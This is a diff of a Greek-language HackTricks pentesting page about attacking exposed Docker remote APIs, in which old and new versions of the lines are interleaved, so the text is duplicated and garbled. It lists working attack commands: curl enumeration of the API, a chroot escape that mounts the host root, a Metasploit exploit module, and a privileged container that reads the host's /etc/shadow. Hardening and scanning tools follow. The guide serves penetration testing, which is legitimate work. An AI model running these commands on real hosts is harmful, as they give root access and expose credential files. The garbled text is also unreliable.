* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## Βασικά για το Docker
|
||||
## WhiteIntel
|
||||
|
||||
### Τι είναι
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Το Docker είναι η **κορυφαία πλατφόρμα** στην **βιομηχανία της containerization**, προωθώντας τη **συνεχή καινοτομία**. Διευκολύνει την απλή δημιουργία και διανομή εφαρμογών, καλύπτοντας από τις **παραδοσιακές έως τις μελλοντικές**, και εξασφαλίζει την **ασφαλή τους ανάπτυξη** σε διάφορα περιβάλλοντα.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
### Βασική αρχιτεκτονική του Docker
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
- **[containerd](http://containerd.io)**: Αυτός είναι ένας **βασικός χρόνος εκτέλεσης** για τα containers, υπεύθυνος για την ολοκληρωμένη **διαχείριση του κύκλου ζωής ενός container**. Αυτό περιλαμβάνει την χειρισμό **μεταφοράς και αποθήκευσης εικόνων**, καθώς και την επίβλεψη της **εκτέλεσης, παρακολούθησης και δικτύωσης** των containers. **Περισσότερες λεπτομερείς πληροφορίες** για το containerd **εξερευνώνται περαιτέρω**.
|
||||
- Το **container-shim** παίζει κρίσιμο ρόλο ως μεσολαβητής στην χειρισμό των **ανεξάρτητων containers**, αναλαμβάνοντας απροβλημάτιστα από το **runc** μετά την αρχικοποίηση των containers.
|
||||
- **[runc](http://runc.io)**: Εκτιμάται για τις δυνατότητες του **ελαφρού και καθολικού χρόνου εκτέλεσης των containers**, το runc είναι συμβατό με το **OCI πρότυπο**. Χρησιμοποιείται από το containerd για να **ξεκινήσει και να διαχειριστεί τα containers** σύμφωνα με τις **οδηγίες του OCI**, έχοντας εξελιχθεί από το αρχικό **libcontainer**.
|
||||
- **[grpc](http://www.grpc.io)** είναι απαραίτητο για την **διευκόλυνση της επικοινωνίας** μεταξύ του containerd και του **docker-engine**, εξασφαλίζοντας **αποτελεσματική αλληλεπίδραση**.
|
||||
- Το **[OCI](https://www.opencontainers.org)** είναι καθοριστικό για τη διατήρηση των **προδιαγραφών του OCI** για την εκτέλεση και τις εικόνες, με τις πιο πρόσφατες εκδόσεις του Docker να είναι **συμμορφωμένες τόσο με τις προδιαγραφές της OCI εικόνας όσο και της εκτέλεσης**.
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
### Βασικές εντολές
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
### Βασικά του Docker
|
||||
|
||||
#### Τι είναι
|
||||
|
||||
Το Docker είναι η **πρωτοπόρος πλατφόρμα** στη βιομηχανία της **εμπορευματοποίησης**, πρωτοστατώντας στη **συνεχή καινοτομία**. Διευκολύνει την απλή δημιουργία και διανομή εφαρμογών, καλύπτοντας από τις **παραδοσιακές έως τις μελλοντικές**, και εξασφαλίζει τη **ασφαλή ανάπτυξή** τους σε διαφορετικά περιβάλλοντα.
|
||||
|
||||
#### Βασική αρχιτεκτονική του Docker
|
||||
|
||||
* [**containerd**](http://containerd.io): Αυτό είναι ένας **πυρήνας εκτέλεσης** για τα containers, υπεύθυνος για την ολοκληρωμένη **διαχείριση του κύκλου ζωής ενός container**. Αυτό περιλαμβάνει τη χειρισμό **μεταφοράς και αποθήκευσης εικόνων**, καθώς και την επίβλεψη της **εκτέλεσης, παρακολούθησης και δικτύωσης** των containers. **Περισσότερες λεπτομέρειες** για το containerd **εξετάζονται περαιτέρω**.
|
||||
* Το **container-shim** διαδραματίζει κρίσιμο ρόλο ως **μεσολαβητής** στη χειρισμό **ανενεργών containers**, παίρνοντας απαλά τη θέση από το **runc** μετά την αρχικοποίηση των containers.
|
||||
* [**runc**](http://runc.io): Εκτιμάται για τις δυνατότητές του ως **ελαφρύς και καθολικός χρόνος εκτέλεσης container**, το runc είναι συμβατός με το **πρότυπο OCI**. Χρησιμοποιείται από το containerd για να **ξεκινήσει και να διαχειριστεί τα containers** σύμφωνα με τις **οδηγίες OCI**, έχοντας εξελιχθεί από το αρχικό **libcontainer**.
|
||||
* [**grpc**](http://www.grpc.io) είναι ουσιώδες για τη **διευκόλυνση της επικοινωνίας** μεταξύ του containerd και της **μηχανής docker**, εξασφαλίζοντας **αποτελεσματική αλληλεπίδραση**.
|
||||
* Το [**OCI**](https://www.opencontainers.org) είναι κρίσιμο για τη διατήρηση των **προδιαγραφών OCI** για το χρόνο εκτέλεσης και τις εικόνες, με τις πιο πρόσφατες εκδόσεις του Docker να είναι **συμμορφωμένες τόσο με τις προδιαγραφές εικόνων όσο και με τον πρότυπο χρόνου εκτέλεσης** του OCI.
|
||||
|
||||
#### Βασικές εντολές
|
||||
```bash
|
||||
docker version #Get version of docker client, API, engine, containerd, runc, docker-init
|
||||
docker info #Get more infomarion about docker settings
|
||||
|
@ -49,13 +65,13 @@ docker system prune -a
|
|||
# - all images without at least one container associated to them
|
||||
# - all build cache
|
||||
```
|
||||
### Containerd
|
||||
#### Containerd
|
||||
|
||||
Το **Containerd** αναπτύχθηκε ειδικά για να εξυπηρετήσει τις ανάγκες πλατφορμών ελαχιστοποίησης όπως το **Docker και το Kubernetes**, μεταξύ άλλων. Στοχεύει να **απλοποιήσει την εκτέλεση των containers** σε διάφορα λειτουργικά συστήματα, συμπεριλαμβανομένων των Linux, Windows, Solaris και άλλων, αφαιρώντας τη λειτουργικότητα και τις κλήσεις συστήματος που είναι ειδικές για κάθε λειτουργικό σύστημα. Ο στόχος του Containerd είναι να περιλαμβάνει μόνο τα απαραίτητα χαρακτηριστικά που απαιτούν οι χρήστες του, προσπαθώντας να παραλείψει τα περιττά στοιχεία. Ωστόσο, η επίτευξη αυτού του στόχου είναι αναγνωρισμένα δύσκολη.
|
||||
**Containerd** αναπτύχθηκε ειδικά για να εξυπηρετήσει τις ανάγκες πλατφορμών ελαχίστων όπως **Docker και Kubernetes**, μεταξύ άλλων. Στοχεύει στο **απλοποίηση της εκτέλεσης των containers** σε διάφορα λειτουργικά συστήματα, συμπεριλαμβανομένων των Linux, Windows, Solaris, και άλλων, με την αφαίρεση λειτουργιών που εξαρτώνται από το λειτουργικό σύστημα και κλήσεις συστήματος. Ο στόχος του Containerd είναι να περιλαμβάνει μόνο τα απαραίτητα χαρακτηριστικά που απαιτούν οι χρήστες του, προσπαθώντας να παραλείψει περιττά στοιχεία. Ωστόσο, η πλήρης επίτευξη αυτού του στόχου αναγνωρίζεται ως πρόκληση.
|
||||
|
||||
Μια κύρια σχεδιαστική απόφαση είναι ότι το **Containerd δεν διαχειρίζεται το δίκτυο**. Το δίκτυο θεωρείται ένα κρίσιμο στοιχείο στα κατανεμημένα συστήματα, με πολυπλοκότητες όπως το Software Defined Networking (SDN) και η ανακάλυψη υπηρεσιών που διαφέρουν σημαντικά από μια πλατφόρμα σε μια άλλη. Επομένως, το Containerd αφήνει τη διαχείριση των δικτυακών πτυχών να γίνεται από τις πλατφόρμες που υποστηρίζει.
|
||||
Μια κύρια σχεδιαστική απόφαση είναι ότι το **Containerd δεν διαχειρίζεται το δίκτυο**. Το δίκτυο θεωρείται κρίσιμο στοιχείο σε κατανεμημένα συστήματα, με πολυπλοκότητες όπως το Λογισμικό Ορισμένου Δικτύου (SDN) και η ανακάλυψη υπηρεσιών που ποικίλλουν σημαντικά από μια πλατφόρμα σε μια άλλη. Επομένως, το Containerd αφήνει τις πτυχές του δικτύου να διαχειρίζονται από τις πλατφόρμες που υποστηρίζει.
|
||||
|
||||
Ενώ το **Docker χρησιμοποιεί το Containerd** για την εκτέλεση των containers, είναι σημαντικό να σημειωθεί ότι το Containerd υποστηρίζει μόνο ένα υποσύνολο των λειτουργιών του Docker. Συγκεκριμένα, το Containerd δεν διαθέτει τις δυνατότητες διαχείρισης δικτύου που υπάρχουν στο Docker και δεν υποστηρίζει τη δημιουργία των Docker swarms απευθείας. Αυτή η διάκριση υπογραμμίζει τον εστιασμένο ρόλο του Containerd ως περιβάλλον εκτέλεσης των containers, αναθέτοντας πιο εξειδικευμένες λειτουργίες στις πλατφόρμες με τις οποίες ενσωματώνεται.
|
||||
Ενώ το **Docker χρησιμοποιεί το Containerd** για την εκτέλεση των containers, είναι σημαντικό να σημειωθεί ότι το Containerd υποστηρίζει μόνο ένα υποσύνολο των λειτουργιών του Docker. Συγκεκριμένα, το Containerd δεν διαθέτει τις δυνατότητες διαχείρισης δικτύου που υπάρχουν στο Docker και δεν υποστηρίζει τη δημιουργία των Docker swarms απευθείας. Αυτή η διάκριση υπογραμμίζει τον εστιασμένο ρόλο του Containerd ως περιβάλλοντος εκτέλεσης container, αναθέτοντας πιο εξειδικευμένες λειτουργίες στις πλατφόρμες με τις οποίες ενσωματώνεται.
|
||||
```bash
|
||||
#Containerd CLI
|
||||
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
|
||||
|
@ -71,46 +87,39 @@ ctr tasks resume <containerName> #Resume cotainer
|
|||
ctr task kill -s SIGKILL <containerName> #Stop running container
|
||||
ctr container delete <containerName>
|
||||
```
|
||||
### Podman
|
||||
#### Podman
|
||||
|
||||
**Podman** είναι ένας open-source κινητήρας ελατηρίων που ακολουθεί τα πρότυπα του [Open Container Initiative (OCI)](https://github.com/opencontainers), αναπτύχθηκε και διατηρείται από την Red Hat. Ξεχωρίζει από το Docker με αρκετά χαρακτηριστικά, ειδικά την **αρχιτεκτονική χωρίς daemon** και την υποστήριξη για **rootless containers**, που επιτρέπει στους χρήστες να εκτελούν ελάχιστα προνόμια.
|
||||
**Podman** είναι ένας μηχανισμός ελαχιστοποίησης που τηρεί τα πρότυπα [Open Container Initiative (OCI)](https://github.com/opencontainers), αναπτύχθηκε και διατηρείται από τη Red Hat. Ξεχωρίζει από το Docker με αρκετά χαρακτηριστικά, ειδικά με την **αρχιτεκτονική χωρίς daemon** και την υποστήριξη για **rootless containers**, επιτρέποντας στους χρήστες να εκτελούν containers χωρίς δικαιώματα ρίζας.
|
||||
|
||||
Ο Podman σχεδιάστηκε για να είναι συμβατός με το API του Docker, επιτρέποντας τη χρήση εντολών του Docker CLI. Αυτή η συμβατότητα επεκτείνεται στο οικοσύστημά του, που περιλαμβάνει εργαλεία όπως το **Buildah** για τη δημιουργία εικόνων ελατηρίων και το **Skopeo** για λειτουργίες εικόνας όπως το push, pull και inspect. Περισσότερες λεπτομέρειες για αυτά τα εργαλεία μπορούν να βρεθούν στην [σελίδα τους στο GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
|
||||
Το Podman σχεδιάστηκε για να είναι συμβατό με το API του Docker, επιτρέποντας τη χρήση εντολών του Docker CLI. Αυτή η συμβατότητα επεκτείνεται στο οικοσύστημά του, το οποίο περιλαμβάνει εργαλεία όπως το **Buildah** για τη δημιουργία εικόνων container και το **Skopeo** για λειτουργίες εικόνας όπως push, pull και inspect. Περισσότερες λεπτομέρειες για αυτά τα εργαλεία μπορούν να βρεθούν στη [σελίδα τους στο GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
|
||||
|
||||
**Κύριες Διαφορές**
|
||||
|
||||
- **Αρχιτεκτονική**: Αντίθετα με το μοντέλο πελάτη-εξυπηρετητή του Docker με ένα daemon στο παρασκήνιο, ο Podman λειτουργεί χωρίς daemon. Αυτός ο σχεδιασμός σημαίνει ότι τα ελάτηρια εκτελούνται με τα προνόμια του χρήστη που τα ξεκινά, βελτιώνοντας την ασφάλεια αποκλείοντας την ανάγκη για πρόσβαση ως root.
|
||||
* **Αρχιτεκτονική**: Αντίθετα με το μοντέλο πελάτη-εξυπηρετητή του Docker με έναν δαίμονα παρασκηνίου, το Podman λειτουργεί χωρίς δαίμονα. Αυτός ο σχεδιασμός σημαίνει ότι τα containers τρέχουν με τα δικαιώματα του χρήστη που τα ξεκινά, βελτιώνοντας την ασφάλεια με το να εξαλείφεται η ανάγκη για πρόσβαση ρίζας.
|
||||
* **Ενσωμάτωση systemd**: Το Podman ενσωματώνεται με το **systemd** για τη διαχείριση των containers, επιτρέποντας τη διαχείριση containers μέσω μονάδων systemd. Αυτό αντίθετα με τη χρήση του systemd από το Docker κυρίως για τη διαχείριση της διαδικασίας του Docker daemon.
|
||||
* **Rootless Containers**: Ένα κεντρικό χαρακτηριστικό του Podman είναι η δυνατότητά του να εκτελεί containers με τα δικαιώματα του χρήστη που τα εκκινεί. Αυτή η προσέγγιση ελαχιστοποιεί τους κινδύνους που σχετίζονται με παραβιάσεις container εξασφαλίζοντας ότι οι επιτιθέμενοι κερδίζουν μόνο τα δικαιώματα του χρήστη που έχει παραβιαστεί, όχι πρόσβαση ρίζας.
|
||||
|
||||
- **Ενσωμάτωση με το systemd**: Ο Podman ενσωματώνεται με το **systemd** για τη διαχείριση των ελατηρίων, επιτρέποντας τη διαχείριση των ελατηρίων μέσω μονάδων systemd. Αυτό αντίθετα με τη χρήση του systemd από το Docker κυρίως για τη διαχείριση της διαδικασίας του Docker daemon.
|
||||
|
||||
- **Rootless Containers**: Ένα καθοριστικό χαρακτηριστικό του Podman είναι η δυνατότητά του να εκτελεί ελάτηρια με τα προνόμια του χρήστη που τα ξεκινά. Αυτή η προσέγγιση ελαχιστοποιεί τους κινδύνους που συνδέονται με παραβιάσεις ελατηρίων, διασφαλίζοντας ότι οι επιτιθέμενοι αποκτούν μόνο τα προνόμια του χρήστη που έχει παραβιαστεί, όχι πρόσβαση ως root.
|
||||
|
||||
Η προσέγγιση του Podman προσφέρει μια ασφαλή και ευέλικτη εναλλακτική λύση στο Docker, με έμφαση στη διαχείριση των προνομίων των χρηστών και τη συμβατότητα με τις υπάρχουσες ροές εργασίας του Docker.
|
||||
|
||||
{% hint style="info" %}
|
||||
Σημειώστε ότι καθώς το podman στοχεύει να υποστηρίξει το ίδιο API με το docker, μπορείτε να χρησιμοποιήσετε τις ίδιες εντολές με το podman όπως με το docker, όπως:
|
||||
Η προσέγγιση του Podman προσφέρει μια ασφαλή και ευέλικτη εναλλακτική λύση στο Docker, τονίζοντας τη διαχείριση δικαιωμάτων χρήστη και τη συμβατότητα με τις υπάρχουσες ροές εργασίας του Docker.
|
||||
```bash
|
||||
podman --version
|
||||
podman info
|
||||
pdoman images ls
|
||||
podman ls
|
||||
```
|
||||
{% endhint %}
|
||||
### Βασικές Πληροφορίες
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το απομακρυσμένο API λειτουργεί από προεπιλογή στη θύρα 2375 όταν είναι ενεργοποιημένο. Το υπηρεσία δεν απαιτεί πιστοποίηση από προεπιλογή, επιτρέποντας σε έναν επιτιθέμενο να ξεκινήσει ένα προνομιούχο docker container. Χρησιμοποιώντας το απομακρυσμένο API, μπορεί κάποιος να συνδέσει τους οικοδεσπότες / (ριζικό κατάλογο) στο container και να διαβάσει/γράψει αρχεία από το περιβάλλον του οικοδεσπότη.
|
||||
Το Remote API τρέχει εξ' ορισμού στη θύρα 2375 όταν είναι ενεργοποιημένο. Η υπηρεσία από προεπιλογή δεν απαιτεί πιστοποίηση επιτρέποντας σε έναν επιτιθέμενο να ξεκινήσει ένα προνομιούχο docker container. Χρησιμοποιώντας το Remote API, κάποιος μπορεί να συνδέσει τους hosts / (ριζικό κατάλογο) στο container και να διαβάσει/γράψει αρχεία του περιβάλλοντος του host.
|
||||
|
||||
**Προεπιλεγμένη θύρα:** 2375
|
||||
```
|
||||
PORT STATE SERVICE
|
||||
2375/tcp open docker
|
||||
```
|
||||
## Απαρίθμηση
|
||||
### Απαρίθμηση
|
||||
|
||||
### Χειροκίνητη
|
||||
#### Χειροκίνητη
|
||||
|
||||
Σημειώστε ότι για να απαριθμήσετε το API του Docker μπορείτε να χρησιμοποιήσετε την εντολή `docker` ή το `curl` όπως στο παρακάτω παράδειγμα:
|
||||
Σημείωση ότι για να απαριθμήσετε το API του docker μπορείτε να χρησιμοποιήσετε την εντολή `docker` ή το `curl` όπως στο παρακάτω παράδειγμα:
|
||||
```bash
|
||||
#Using curl
|
||||
curl -s http://open.docker.socket:2375/version | jq #Get version
|
||||
|
@ -146,19 +155,19 @@ docker-init:
|
|||
Version: 0.18.0
|
||||
GitCommit: fec3683
|
||||
```
|
||||
Αν μπορείτε να **επικοινωνήσετε με το απομακρυσμένο API του Docker με την εντολή `docker`**, μπορείτε να **εκτελέσετε** οποιαδήποτε από τις **προηγούμενες εντολές του docker** [**που σχολιάστηκαν προηγουμένως**](2375-pentesting-docker.md#basic-commands) για να αλληλεπιδράσετε με την υπηρεσία.
|
||||
Εάν μπορείτε **να επικοινωνήσετε με το απομακρυσμένο API του docker με την εντολή `docker`** μπορείτε **να εκτελέσετε** οποιαδήποτε από τις **εντολές του docker** [**που προαναφέρθηκαν προηγουμένως**](2375-pentesting-docker.md#basic-commands) για να αλληλεπιδράσετε με την υπηρεσία.
|
||||
|
||||
{% hint style="info" %}
|
||||
Μπορείτε να `export DOCKER_HOST="tcp://localhost:2375"` και να **αποφύγετε** τη χρήση της παραμέτρου `-H` με την εντολή docker.
|
||||
Μπορείτε να `εξάγετε το DOCKER_HOST="tcp://localhost:2375"` και **να αποφύγετε** τη χρήση της παραμέτρου `-H` με την εντολή docker
|
||||
{% endhint %}
|
||||
|
||||
#### Γρήγορη ανέλιξη προνομιακών δικαιωμάτων
|
||||
**Γρήγορη ανόδος προνομιακών δικαιωμάτων**
|
||||
```bash
|
||||
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
|
||||
```
|
||||
#### Curl
|
||||
**Curl**
|
||||
|
||||
Μερικές φορές θα δείτε τη θύρα **2376** ανοικτή για το **TLS** endpoint. Δεν έχω καταφέρει να συνδεθώ με αυτή χρησιμοποιώντας τον πελάτη του docker, αλλά είναι δυνατό να το κάνετε με το curl.
|
||||
Μερικές φορές θα δείτε το **2376** ενεργό για το σημείο **TLS**. Δεν έχω καταφέρει να συνδεθώ με τον πελάτη docker αλλά είναι δυνατό να γίνει με το curl.
|
||||
```bash
|
||||
#List containers
|
||||
curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
|
||||
|
@ -188,94 +197,94 @@ curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
|
|||
#Delete stopped containers
|
||||
curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
|
||||
```
|
||||
Εάν θέλετε περισσότερες πληροφορίες για αυτό, περισσότερες πληροφορίες είναι διαθέσιμες εκεί όπου αντέγραψα τις εντολές: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
|
||||
Εάν θέλετε περισσότερες πληροφορίες σχετικά με αυτό, υπάρχουν περισσότερες πληροφορίες εκεί που αντέγραψα τις εντολές από: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
|
||||
|
||||
### Αυτόματο
|
||||
#### Αυτόματο
|
||||
```bash
|
||||
msf> use exploit/linux/http/docker_daemon_tcp
|
||||
nmap -sV --script "docker-*" -p <PORT> <IP>
|
||||
```
|
||||
## Παραβίαση
|
||||
### Θέτοντας σε κίνδυνο
|
||||
|
||||
Στην ακόλουθη σελίδα μπορείτε να βρείτε τρόπους για να **δραπετεύσετε από ένα docker container**:
|
||||
Στην ακόλουθη σελίδα μπορείτε να βρείτε τρόπους για **δραπέτευση από ένα docker container**:
|
||||
|
||||
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
|
||||
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Εκμεταλλευόμενοι αυτό, είναι δυνατόν να δραπευσετε από ένα container, μπορείτε να εκτελέσετε ένα αδύναμο container στον απομακρυσμένο υπολογιστή, να δραπευσετε από αυτό και να παραβιάσετε τον υπολογιστή:
|
||||
Χρησιμοποιώντας αυτό, είναι δυνατόν να δραπετεύσετε από ένα container, να εκτελέσετε ένα αδύναμο container στον απομακρυσμένο υπολογιστή, να δραπετεύσετε από αυτόν και να θέσετε σε κίνδυνο τον υπολογιστή:
|
||||
```bash
|
||||
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
|
||||
cat /mnt/etc/shadow
|
||||
```
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
|
||||
|
||||
## Ανόδος Προνομίων
|
||||
### Ανόρθωση προνομίων
|
||||
|
||||
Αν βρίσκεστε μέσα σε έναν υπολογιστή που χρησιμοποιεί το Docker, μπορείτε [**να διαβάσετε αυτές τις πληροφορίες για να προσπαθήσετε να αναβαθμίσετε τα προνόμια**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
Αν βρίσκεστε μέσα σε έναν κεντρικό υπολογιστή που χρησιμοποιεί το Docker, μπορείτε [**να διαβάσετε αυτές τις πληροφορίες για να προσπαθήσετε να αναβαθμίσετε τα προνόμια**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
|
||||
## Ανακάλυψη μυστικών σε εκτελούμενα Docker containers
|
||||
### Ανακάλυψη μυστικών σε ενεργά εκτελούμενα Docker containers
|
||||
```bash
|
||||
docker ps [| grep <kubernetes_service_name>]
|
||||
docker inspect <docker_id>
|
||||
```
|
||||
Ελέγξτε το **env** (τμήμα μεταβλητών περιβάλλοντος) για μυστικά και μπορεί να βρείτε:
|
||||
|
||||
* Κωδικοί πρόσβασης.
|
||||
* Κωδικούς πρόσβασης.
|
||||
* Διευθύνσεις IP.
|
||||
* Θύρες.
|
||||
* Διαδρομές.
|
||||
* Άλλα... .
|
||||
|
||||
Εάν θέλετε να εξάγετε ένα αρχείο:
|
||||
Αν θέλετε να εξάγετε ένα αρχείο:
|
||||
```bash
|
||||
docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
||||
```
|
||||
## Ασφάλεια του Docker σας
|
||||
### Ασφάλεια του Docker σας
|
||||
|
||||
### Ασφάλεια της εγκατάστασης και χρήσης του Docker
|
||||
#### Ασφάλεια της εγκατάστασης και χρήσης του Docker
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) για να επιθεωρήσετε την τρέχουσα εγκατάσταση του Docker.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) για να ελέγξετε την τρέχουσα εγκατάσταση του Docker σας.
|
||||
* `./docker-bench-security.sh`
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/kost/dockscan](https://github.com/kost/dockscan) για να επιθεωρήσετε την τρέχουσα εγκατάσταση του Docker.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/kost/dockscan](https://github.com/kost/dockscan) για να ελέγξετε την τρέχουσα εγκατάσταση του Docker σας.
|
||||
* `dockscan -v unix:///var/run/docker.sock`
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) για να ελέγξετε τα προνόμια που θα έχει ένας container όταν εκτελεστεί με διάφορες επιλογές ασφαλείας. Αυτό είναι χρήσιμο για να γνωρίζετε τις επιπτώσεις της χρήσης ορισμένων επιλογών ασφαλείας για την εκτέλεση ενός container:
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) για να δείτε τα προνόμια που θα έχει ένας container όταν εκτελεστεί με διαφορετικές επιλογές ασφαλείας. Αυτό είναι χρήσιμο για να γνωρίζετε τις επιπτώσεις της χρήσης ορισμένων επιλογών ασφαλείας για την εκτέλεση ενός container:
|
||||
* `docker run --rm -it r.j3ss.co/amicontained`
|
||||
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
|
||||
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
|
||||
|
||||
### Ασφάλεια των Docker Images
|
||||
#### Ασφάλεια των Docker Images
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε ένα docker image του [https://github.com/quay/clair](https://github.com/quay/clair) για να σαρώσετε τα άλλα docker images σας και να βρείτε ευπάθειες.
|
||||
* Μπορείτε να χρησιμοποιήσετε ένα docker image του [https://github.com/quay/clair](https://github.com/quay/clair) για να σαρώσετε τις άλλες docker εικόνες σας και να βρείτε ευπάθειες.
|
||||
* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
|
||||
* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
|
||||
|
||||
### Ασφάλεια των Dockerfiles
|
||||
#### Ασφάλεια των Dockerfiles
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) για να **επιθεωρήσετε το Dockerfile** σας και να βρείτε όλες τις είδους μη σωστές ρυθμίσεις. Κάθε μη σωστή ρύθμιση θα έχει ένα αναγνωριστικό, μπορείτε να βρείτε εδώ [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) πώς να διορθώσετε κάθε μία από αυτές.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις. Κάθε μη σωστή ρύθμιση θα δοθεί ένα ID, μπορείτε να βρείτε εδώ [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) πώς να διορθώσετε κάθε μία από αυτές.
|
||||
* `dockerfilelinter -f Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (418).png>)
|
||||
![](<../.gitbook/assets/image (173).png>)
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) για να **επιθεωρήσετε το Dockerfile** σας και να βρείτε όλες τις είδους μη σωστές ρυθμίσεις.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις.
|
||||
* `dockerfilelint Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (419).png>)
|
||||
![](<../.gitbook/assets/image (209).png>)
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) για να **επιθεωρήσετε το Dockerfile** σας και να βρείτε όλες τις είδους μη σωστές ρυθμίσεις.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις.
|
||||
* `dockerlint Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (420).png>)
|
||||
![](<../.gitbook/assets/image (68).png>)
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) για να **επιθεωρήσετε το Dockerfile** σας και να βρείτε όλες τις είδους μη σωστές ρυθμίσεις.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις.
|
||||
* `hadolint Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (421).png>)
|
||||
![](<../.gitbook/assets/image (498).png>)
|
||||
|
||||
### Καταγραφή ύποπτης δραστηριότητας
|
||||
#### Καταγραφή Υπούλων Δραστηριοτήτων
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) για να ανιχνεύσετε **ύποπτη συμπεριφορά σε εκτελούμενα containers**.
|
||||
